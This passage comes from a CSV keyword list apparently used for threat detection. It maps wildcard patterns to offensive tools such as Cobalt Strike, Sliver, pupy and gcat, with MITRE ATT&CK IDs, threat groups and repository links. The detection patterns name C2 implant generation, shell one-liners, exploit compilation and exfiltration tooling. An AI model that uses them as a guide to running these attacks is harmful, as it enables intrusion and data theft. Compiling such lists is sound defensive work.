- TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*Gality369/CS-Loader*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*gateway-finder*","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. 
New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","57","7","2020-12-14T09:52:29Z","2018-04-18T12:43:11Z" +"*gather/keylogger*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" 
+"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*gather/user_hunter*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*gatherer/gatherer.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z"
+"*gato * attack*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z"
+"*gato * enumerate*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z"
+"*gato * --http-proxy*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z"
+"*gato * --socks-proxy*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z"
+"*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*","greyware_tool_keyword","westwind","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*gbmdmipapolaohpinhblmcnpmmlgfgje*","greyware_tool_keyword","Unblock Websites","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*gc2-sheet.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z"
+"*GC2-sheet/cmd*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using 
Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z"
+"*gcat*implant.py*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z"
+"*gcat.is.the.shit@gmail.com*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z"
+"*gcc cve_2022_0847.c -o exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z"
+"*gcc dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z"
+"*gci -h C:\pagefile.sys*","greyware_tool_keyword","powershell","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*gcknhkkoolaabfmlnjonogaaifnjlfnp*","greyware_tool_keyword","FoxyProxy Standard","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*gconv-modules*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z"
+"*gcp_functionalc2.profile*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z"
+"*GCPBucketBrute*","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. 
and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","406","82","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z"
+"*GCR - Google Calendar RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z"
+"*GCR-Google-Calendar-RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z"
+"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z"
+"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*genCrossC2 *","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*genCrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*genCrossC2.Win.exe*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*Generalrecon -noninteractive*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*generate beacon --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate exe Shadow*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
+"*generate --http http*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - 
T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate --mtls * --os windows *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate --mtls * --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate payload=*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*generate --tcp-pivot *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate/canaries.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate/implants.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*generate_beacon*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z"
+"*generate_beanshell1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"*generate_exploit_path_from_template*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*generate_golden_saml*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*generate_hta operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
+"*generate_jdk8u20*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"*generate_loader_cmd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*generate_mozillarhino1*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"*generate_mozillarhino2*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"*generate_powershell operation1*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
